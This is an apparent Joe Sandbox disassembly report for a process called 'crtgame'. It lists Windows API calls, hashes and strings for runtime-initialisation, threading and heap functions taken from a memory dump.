                                                                                                              • Part of subcall function 02C318F0: CloseHandle.KERNEL32(00000000,?,?,02C3114E,?,?), ref: 02C31934
                                                                                                              • Part of subcall function 02C318F0: SetEvent.KERNEL32(00000000,02C3114E,?,?), ref: 02C31947
                                                                                                            • OpenEventA.KERNEL32(00100002,00000000,00000000), ref: 02C310D0
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C310E5
                                                                                                            • ResetEvent.KERNEL32(00000000), ref: 02C310EF
                                                                                                            • CloseHandle.KERNEL32(00000000,AC2FC4E2), ref: 02C31124
                                                                                                            • __CxxThrowException@8.LIBCMT ref: 02C31155
                                                                                                              • Part of subcall function 02C33F7A: RaiseException.KERNEL32(?,?,?,02C50F6C,?,00000400,?,?,?,02C335BD,?,02C50F6C,00000000,00000001), ref: 02C33FCF
                                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,AC2FC4E2), ref: 02C3119A
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C311AF
                                                                                                              • Part of subcall function 02C31630: GetCurrentProcessId.KERNEL32(?), ref: 02C31689
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,AC2FC4E2), ref: 02C311BF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Event$CloseHandle$Open$CreateCurrentExceptionException@8ObjectProcessRaiseResetSingleThrowWait
                                                                                                            • String ID:
                                                                                                            • API String ID: 2227236058-0
                                                                                                            • Opcode ID: 1697f86826fd12de876d0a30fc5ac33a76be648649da64265ee9ed0717c438d4
                                                                                                            • Instruction ID: 3bbb80cd0ecece3f46cb078af95f883f17bb61836ee69bd4c068526823510212
                                                                                                            • Opcode Fuzzy Hash: 1697f86826fd12de876d0a30fc5ac33a76be648649da64265ee9ed0717c438d4
                                                                                                            • Instruction Fuzzy Hash: D9319371E003489FDF22CBE4DC44BADB7B8AF45314F184A19E81CEB280D7B09A05CBA1
                                                                                                            APIs
                                                                                                            • __init_pointers.LIBCMT ref: 02C357B4
                                                                                                              • Part of subcall function 02C37F22: RtlEncodePointer.NTDLL(00000000), ref: 02C37F25
                                                                                                              • Part of subcall function 02C37F22: __initp_misc_winsig.LIBCMT ref: 02C37F40
                                                                                                              • Part of subcall function 02C37F22: GetModuleHandleW.KERNEL32(kernel32.dll,?), ref: 02C38CA1
                                                                                                              • Part of subcall function 02C37F22: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 02C38CB5
                                                                                                              • Part of subcall function 02C37F22: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 02C38CC8
                                                                                                              • Part of subcall function 02C37F22: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 02C38CDB
                                                                                                              • Part of subcall function 02C37F22: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 02C38CEE
                                                                                                              • Part of subcall function 02C37F22: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 02C38D01
                                                                                                              • Part of subcall function 02C37F22: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 02C38D14
                                                                                                              • Part of subcall function 02C37F22: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 02C38D27
                                                                                                              • Part of subcall function 02C37F22: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 02C38D3A
                                                                                                              • Part of subcall function 02C37F22: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 02C38D4D
                                                                                                              • Part of subcall function 02C37F22: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 02C38D60
                                                                                                              • Part of subcall function 02C37F22: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 02C38D73
                                                                                                              • Part of subcall function 02C37F22: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 02C38D86
                                                                                                              • Part of subcall function 02C37F22: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 02C38D99
                                                                                                              • Part of subcall function 02C37F22: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 02C38DAC
                                                                                                              • Part of subcall function 02C37F22: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 02C38DBF
                                                                                                            • __mtinitlocks.LIBCMT ref: 02C357B9
                                                                                                            • __mtterm.LIBCMT ref: 02C357C2
                                                                                                              • Part of subcall function 02C3582A: RtlDeleteCriticalSection.NTDLL(00000000), ref: 02C38358
                                                                                                              • Part of subcall function 02C3582A: RtlDeleteCriticalSection.NTDLL(02C53978), ref: 02C38381
                                                                                                            • __calloc_crt.LIBCMT ref: 02C357E7
                                                                                                            • __initptd.LIBCMT ref: 02C35809
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 02C35810
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm
                                                                                                            • String ID:
                                                                                                            • API String ID: 1500305132-0
                                                                                                            • Opcode ID: 8ef82b0d0c355e10d9d83d8c29d2186d78216821a8ef13d7878d212af72ee8f1
                                                                                                            • Instruction ID: a11e6efdf669665121d05d430b41f9dbd280d910d72a51c5823714bae3a40e63
                                                                                                            • Opcode Fuzzy Hash: 8ef82b0d0c355e10d9d83d8c29d2186d78216821a8ef13d7878d212af72ee8f1
                                                                                                            • Instruction Fuzzy Hash: 76F024325A97515AE6373AB47C0138A2BC6EF06BF0BA00F29F450D60C1FF11D4411991
                                                                                                            APIs
                                                                                                            • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,?,02C32E93,00000000), ref: 02C32EFB
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 02C32F02
                                                                                                            • RtlEncodePointer.NTDLL(00000000), ref: 02C32F0E
                                                                                                            • RtlDecodePointer.NTDLL(00000001), ref: 02C32F2B
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                                            • String ID: RoInitialize$combase.dll
                                                                                                            • API String ID: 3489934621-340411864
                                                                                                            • Opcode ID: 6589038d68f424bc6f07b0ebd5bfd4e721a77ae61b45d37586d7da1f19141e5c
                                                                                                            • Instruction ID: dcdda6e0fe8f359255c29b7c60124339ba52a9f039fb6cec72368dd5e03cdc63
                                                                                                            • Opcode Fuzzy Hash: 6589038d68f424bc6f07b0ebd5bfd4e721a77ae61b45d37586d7da1f19141e5c
                                                                                                            • Instruction Fuzzy Hash: F1E01274DD0360AAFF101F70EC09B46779DAB94702FA04F24F405E1081DBB581A89F54
                                                                                                            APIs
                                                                                                            • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,02C32ED0), ref: 02C32FD1
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 02C32FD8
                                                                                                            • RtlEncodePointer.NTDLL(00000000), ref: 02C32FE3
                                                                                                            • RtlDecodePointer.NTDLL(02C32ED0), ref: 02C32FFE
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                                            • String ID: RoUninitialize$combase.dll
                                                                                                            • API String ID: 3489934621-2819208100
                                                                                                            • Opcode ID: 7111cdbbb8e9e5f6e52a91f4054f691c797dc70cc3e2e8aea8de07a12caebbdd
                                                                                                            • Instruction ID: e51fa7edb8ce491bee340ad01fe6ca8793696e428b046eeafe58685a5a83341e
                                                                                                            • Opcode Fuzzy Hash: 7111cdbbb8e9e5f6e52a91f4054f691c797dc70cc3e2e8aea8de07a12caebbdd
                                                                                                            • Instruction Fuzzy Hash: 59E0B674DC1314ABFB605F60AD0DB567AADBB84702FA04F24F506E1094DFB890A8DB98
                                                                                                            APIs
                                                                                                            • TlsGetValue.KERNEL32(00000025,AC2FC4E2,?,?,?,?,00000000,02C464E8,000000FF,02C31BEA), ref: 02C3198A
                                                                                                            • TlsSetValue.KERNEL32(00000025,02C31BEA,?,?,00000000), ref: 02C319F7
                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C31A21
                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C31A24
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: HeapValue$FreeProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 1812714009-0
                                                                                                            • Opcode ID: 29aa0dc458f897c490e1ec15e587dbc1bc1a4cad9162955ddce6aeeddd78e2c7
                                                                                                            • Instruction ID: f1643514f38bdcc1222e14a5871ed3aad01c2a0a14d64763b8257e6d4e4d489e
                                                                                                            • Opcode Fuzzy Hash: 29aa0dc458f897c490e1ec15e587dbc1bc1a4cad9162955ddce6aeeddd78e2c7
                                                                                                            • Instruction Fuzzy Hash: 3E519E359443449FDB22DF69C448B16BBE4EF85765F0D8E58E85D97280D7B0ED04CBA0
                                                                                                            APIs
                                                                                                            • _ValidateScopeTableHandlers.LIBCMT ref: 02C451C0
                                                                                                            • __FindPESection.LIBCMT ref: 02C451DA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FindHandlersScopeSectionTableValidate
                                                                                                            • String ID:
                                                                                                            • API String ID: 876702719-0
                                                                                                            • Opcode ID: 1ab79c1c4ed2638698de256f46622999ad035708644754600f09f88afe87fc90
                                                                                                            • Instruction ID: 66d19a2fed47fd9a6b1aec8237905535569179444541be70b06c83ce14a34e3b
                                                                                                            • Opcode Fuzzy Hash: 1ab79c1c4ed2638698de256f46622999ad035708644754600f09f88afe87fc90
                                                                                                            • Instruction Fuzzy Hash: 4EA1B276E003158FCB21CF58D980BAEB7A5FB94394F944669DC09E7350EB31E985CB90
                                                                                                            APIs
                                                                                                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 02C21CB1
                                                                                                            • CloseHandle.KERNEL32(?), ref: 02C21CBA
                                                                                                            • InterlockedExchangeAdd.KERNEL32(02C57468,00000000), ref: 02C21CC6
                                                                                                            • TerminateThread.KERNEL32(?,00000000), ref: 02C21CD4
                                                                                                            • QueueUserAPC.KERNEL32(02C21E7C,?,00000000), ref: 02C21CE1
                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 02C21CEC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Wait$CloseExchangeHandleInterlockedMultipleObjectObjectsQueueSingleTerminateThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 1946104331-0
                                                                                                            • Opcode ID: bc9024c39fc50cb963f0602d22fbf7194ad162b94c4f60d7fac11765a809a470
                                                                                                            • Instruction ID: 5cc9b21b3d392b0b6d539bf3be580c5c94d8c133f9757bdeb7b8bdf0427c602f
                                                                                                            • Opcode Fuzzy Hash: bc9024c39fc50cb963f0602d22fbf7194ad162b94c4f60d7fac11765a809a470
                                                                                                            • Instruction Fuzzy Hash: E1F0A439941224BFDB204B9ADD0DD57FFFCEB85721700475AF52A82190DBB0A918CBA0
                                                                                                            APIs
                                                                                                            • std::exception::exception.LIBCMT ref: 02C3139F
                                                                                                              • Part of subcall function 02C31EF3: std::exception::_Copy_str.LIBCMT ref: 02C31F0C
                                                                                                              • Part of subcall function 02C30770: __CxxThrowException@8.LIBCMT ref: 02C307CE
                                                                                                            • std::exception::exception.LIBCMT ref: 02C313FE
                                                                                                            Strings
                                                                                                            • boost unique_lock has no mutex, xrefs: 02C3138E
                                                                                                            • boost unique_lock owns already the mutex, xrefs: 02C313ED
                                                                                                            • $, xrefs: 02C31403
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: std::exception::exception$Copy_strException@8Throwstd::exception::_
                                                                                                            • String ID: $$boost unique_lock has no mutex$boost unique_lock owns already the mutex
                                                                                                            • API String ID: 2140441600-46888669
                                                                                                            • Opcode ID: e785064b2254cb17d41b6d5aeaf6680391e62a8728668393ed6aefb6497ac863
                                                                                                            • Instruction ID: 10ae5623fde08fbe8a3b4ebeb677614c4619493d74c729a522ab0c477cecd87d
                                                                                                            • Opcode Fuzzy Hash: e785064b2254cb17d41b6d5aeaf6680391e62a8728668393ed6aefb6497ac863
                                                                                                            • Instruction Fuzzy Hash: ED2123B25087809FD721DF24C44475BBBE9BB89B48F404E5DF8A587280DBB5D808CF82
                                                                                                            APIs
                                                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 02C22350
                                                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 02C22360
                                                                                                            • PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02C22370
                                                                                                            • GetLastError.KERNEL32 ref: 02C2237A
                                                                                                              • Part of subcall function 02C21712: __EH_prolog.LIBCMT ref: 02C21717
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ExchangeInterlocked$CompletionErrorH_prologLastPostQueuedStatus
                                                                                                            • String ID: pqcs
                                                                                                            • API String ID: 1619523792-2559862021
                                                                                                            • Opcode ID: 1cf5454ac2476d949497733195dbced2ee4797a64e4a780cbfca087334a4659a
                                                                                                            • Instruction ID: 4d73df5d4128275d6621cd97ef3d6b7f3cd935b08cce52b758d526885ac4751a
                                                                                                            • Opcode Fuzzy Hash: 1cf5454ac2476d949497733195dbced2ee4797a64e4a780cbfca087334a4659a
                                                                                                            • Instruction Fuzzy Hash: 42F05B75A413146FD720AF749909B6B77ECDB41601F400659F90DD2140FB71E6189BD1
                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 02C24035
                                                                                                            • GetProcessHeap.KERNEL32(00000000,02C2A5D9,?,?,?,?,?,02C2A5D9), ref: 02C24042
                                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02C24049
                                                                                                            • std::exception::exception.LIBCMT ref: 02C24063
                                                                                                              • Part of subcall function 02C2A069: __EH_prolog.LIBCMT ref: 02C2A06E
                                                                                                              • Part of subcall function 02C2A069: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02C2A07D
                                                                                                              • Part of subcall function 02C2A069: __CxxThrowException@8.LIBCMT ref: 02C2A09C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: H_prologHeap$AllocateConcurrency::cancellation_token::_Exception@8FromImplProcessThrowstd::exception::exception
                                                                                                            • String ID: bad allocation
                                                                                                            • API String ID: 3112922283-2104205924
                                                                                                            • Opcode ID: 98f8be0dd9012a80705025b2c5a09cf1c18b4caff403c26f8cf41e9ed1d578ae
                                                                                                            • Instruction ID: 3c83f34a9416dc52680051971746ca82fed5e982e83078fab8eb84c1cb076c72
                                                                                                            • Opcode Fuzzy Hash: 98f8be0dd9012a80705025b2c5a09cf1c18b4caff403c26f8cf41e9ed1d578ae
                                                                                                            • Instruction Fuzzy Hash: 68F0F8B1E44209AFDB14AFE0D908BAFBB79FB08745F404A59E915A2280DB7552188FE1
                                                                                                            APIs
                                                                                                              • Part of subcall function 02C31470: CloseHandle.KERNEL32(00000000,AC2FC4E2), ref: 02C314C1
                                                                                                              • Part of subcall function 02C31470: WaitForSingleObject.KERNEL32(?,000000FF,AC2FC4E2,?,?,?,?,AC2FC4E2,02C31443,AC2FC4E2), ref: 02C314D8
                                                                                                            • ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 02C3173E
                                                                                                            • ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 02C3175E
                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 02C31797
                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 02C317EB
                                                                                                            • SetEvent.KERNEL32(?), ref: 02C317F2
                                                                                                              • Part of subcall function 02C2418C: CloseHandle.KERNEL32(00000000,?,02C31725), ref: 02C241B0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle$ReleaseSemaphore$EventObjectSingleWait
                                                                                                            • String ID:
                                                                                                            • API String ID: 4166353394-0
                                                                                                            • Opcode ID: 30c815e4c47e027d7172bb4fc68667b30cd1bc27c4b594db050f25542b1d42b1
                                                                                                            • Instruction ID: 68b18f7fa2af06ed5ca3e0b64ea2cbbdec79f4f87aabdd895b94ce3c8d0fac40
                                                                                                            • Opcode Fuzzy Hash: 30c815e4c47e027d7172bb4fc68667b30cd1bc27c4b594db050f25542b1d42b1
                                                                                                            • Instruction Fuzzy Hash: B441B1716003118FDB269F18CC80B1777E8EB86764F1C0A68EC189B295D775D915CBA5
                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 02C2DA9C
                                                                                                              • Part of subcall function 02C21A01: TlsGetValue.KERNEL32 ref: 02C21A0A
                                                                                                            • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C2DB1B
                                                                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 02C2DB37
                                                                                                            • InterlockedIncrement.KERNEL32(02C55170), ref: 02C2DB5C
                                                                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 02C2DB71
                                                                                                              • Part of subcall function 02C227F3: SetWaitableTimer.KERNEL32(00000000,?,000493E0,00000000,00000000,00000000,00000000,00000000,0000000A,00000000), ref: 02C2284E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CriticalInterlockedSection$EnterExchangeH_prologIncrementLeaveTimerValueWaitable
                                                                                                            • String ID:
                                                                                                            • API String ID: 1578506061-0
                                                                                                            • Opcode ID: 316bf89c03d877c0c987adaefc1f2d3ca5b349a4faeac2f4680e6cc3b7f7ddd0
                                                                                                            • Instruction ID: 2e592b7a8a007a7d117958ef02d0c0185facc25a507509db1c54602126b6460d
                                                                                                            • Opcode Fuzzy Hash: 316bf89c03d877c0c987adaefc1f2d3ca5b349a4faeac2f4680e6cc3b7f7ddd0
                                                                                                            • Instruction Fuzzy Hash: AA3128B19013149FCB10DFA9C9447AEBBF8BF58310F14855ED84AD7641EB74A608CFA1
                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 02C221DA
                                                                                                            • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C221ED
                                                                                                            • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,00000001), ref: 02C22224
                                                                                                            • TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,00000001), ref: 02C22237
                                                                                                            • TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02C22261
                                                                                                              • Part of subcall function 02C22341: InterlockedExchange.KERNEL32(?,00000001), ref: 02C22350
                                                                                                              • Part of subcall function 02C22341: InterlockedExchange.KERNEL32(?,00000001), ref: 02C22360
                                                                                                              • Part of subcall function 02C22341: PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02C22370
                                                                                                              • Part of subcall function 02C22341: GetLastError.KERNEL32 ref: 02C2237A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ExchangeInterlockedValue$CompletionErrorH_prologLastPostQueuedStatus
                                                                                                            • String ID:
                                                                                                            • API String ID: 1856819132-0
                                                                                                            • Opcode ID: 31f69a0976b196842b530e05b7a2acdf70c68837122e43625cc8fbcaec62f353
                                                                                                            • Instruction ID: b1ce02886a3d1f6d655728d1a9e90ad60f5abd0a94875bbdd2b0caebaef9b352
                                                                                                            • Opcode Fuzzy Hash: 31f69a0976b196842b530e05b7a2acdf70c68837122e43625cc8fbcaec62f353
                                                                                                            • Instruction Fuzzy Hash: A8116D72D01229DBCB119FA5E8046AEFFBAFB44320F104A1AE815A2260DB718659DF81
                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 02C2229D
                                                                                                            • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C222B0
                                                                                                            • TlsGetValue.KERNEL32 ref: 02C222E7
                                                                                                            • TlsSetValue.KERNEL32(?), ref: 02C22300
                                                                                                            • TlsSetValue.KERNEL32(?,?,?), ref: 02C2231C
                                                                                                              • Part of subcall function 02C22341: InterlockedExchange.KERNEL32(?,00000001), ref: 02C22350
                                                                                                              • Part of subcall function 02C22341: InterlockedExchange.KERNEL32(?,00000001), ref: 02C22360
                                                                                                              • Part of subcall function 02C22341: PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02C22370
                                                                                                              • Part of subcall function 02C22341: GetLastError.KERNEL32 ref: 02C2237A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ExchangeInterlockedValue$CompletionErrorH_prologLastPostQueuedStatus
                                                                                                            • String ID:
                                                                                                            • API String ID: 1856819132-0
                                                                                                            • Opcode ID: fd0e59fa7de4863740902fd6be51ab62c0e0a7e47a95140bc7e3a0e9dc4f823b
                                                                                                            • Instruction ID: b12c28870811616b16d77193ee66d71abb2bad9bc38c383d59a086a82f30ac4b
                                                                                                            • Opcode Fuzzy Hash: fd0e59fa7de4863740902fd6be51ab62c0e0a7e47a95140bc7e3a0e9dc4f823b
                                                                                                            • Instruction Fuzzy Hash: B8115E76D012299FCB019FA5EC046AEFFBAFF44310F14855AE804A3210DB719A59DF91
                                                                                                            APIs
                                                                                                              • Part of subcall function 02C2AB04: __EH_prolog.LIBCMT ref: 02C2AB09
                                                                                                            • __CxxThrowException@8.LIBCMT ref: 02C2B6CE
                                                                                                              • Part of subcall function 02C33F7A: RaiseException.KERNEL32(?,?,?,02C50F6C,?,00000400,?,?,?,02C335BD,?,02C50F6C,00000000,00000001), ref: 02C33FCF
                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,Function_00030DA4,?,00000001), ref: 02C2B6E4
                                                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 02C2B6F7
                                                                                                            • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000001,00000000,?,?,?,Function_00030DA4,?,00000001), ref: 02C2B707
                                                                                                            • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C2B715
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ExchangeInterlocked$CompletionExceptionException@8H_prologObjectPostQueuedRaiseSingleStatusThrowWait
                                                                                                            • String ID:
                                                                                                            • API String ID: 2725315915-0
                                                                                                            • Opcode ID: 48ed175bf17b53a28570c820f1de637610cf3a72fb7d49e2afc7c8bc3703455a
                                                                                                            • Instruction ID: df3dc80281a8579ad17c0a8433e57459f7315b390053591bfbc6bdfb9c5ef6fa
                                                                                                            • Opcode Fuzzy Hash: 48ed175bf17b53a28570c820f1de637610cf3a72fb7d49e2afc7c8bc3703455a
                                                                                                            • Instruction Fuzzy Hash: 130186BAA40215AFDB109BA4DC89F8777EDEB04759F004955F615D7190DB61E8088BA0
                                                                                                            APIs
                                                                                                            • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02C22432
                                                                                                            • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02C22445
                                                                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 02C22454
                                                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 02C22469
                                                                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 02C22470
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CriticalExchangeInterlockedSection$CompareCompletionEnterLeavePostQueuedStatus
                                                                                                            • String ID:
                                                                                                            • API String ID: 747265849-0
                                                                                                            • Opcode ID: cd822799d565ecd7e4463680e5d1f489fc921153c2b5b5bf80e10e832ec77ff1
                                                                                                            • Instruction ID: d35dc45eefddae35db2378663f7793875b2ba667244407ea11869291e080f454
                                                                                                            • Opcode Fuzzy Hash: cd822799d565ecd7e4463680e5d1f489fc921153c2b5b5bf80e10e832ec77ff1
                                                                                                            • Instruction Fuzzy Hash: 93F03076641214BBD7109BA0ED89FDBB76CFB44711F804911F701D6480DB61BA28CBE1
                                                                                                            APIs
                                                                                                            • InterlockedIncrement.KERNEL32(?), ref: 02C21ED2
                                                                                                            • PostQueuedCompletionStatus.KERNEL32(?,?,?,00000000,00000000,?), ref: 02C21EEA
                                                                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 02C21EF9
                                                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 02C21F0E
                                                                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 02C21F15
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CriticalInterlockedSection$CompletionEnterExchangeIncrementLeavePostQueuedStatus
                                                                                                            • String ID:
                                                                                                            • API String ID: 830998967-0
                                                                                                            • Opcode ID: 3f0b02856b9c37a8304a60430c210a316ef8de9022404cc700c50693d76ba7ab
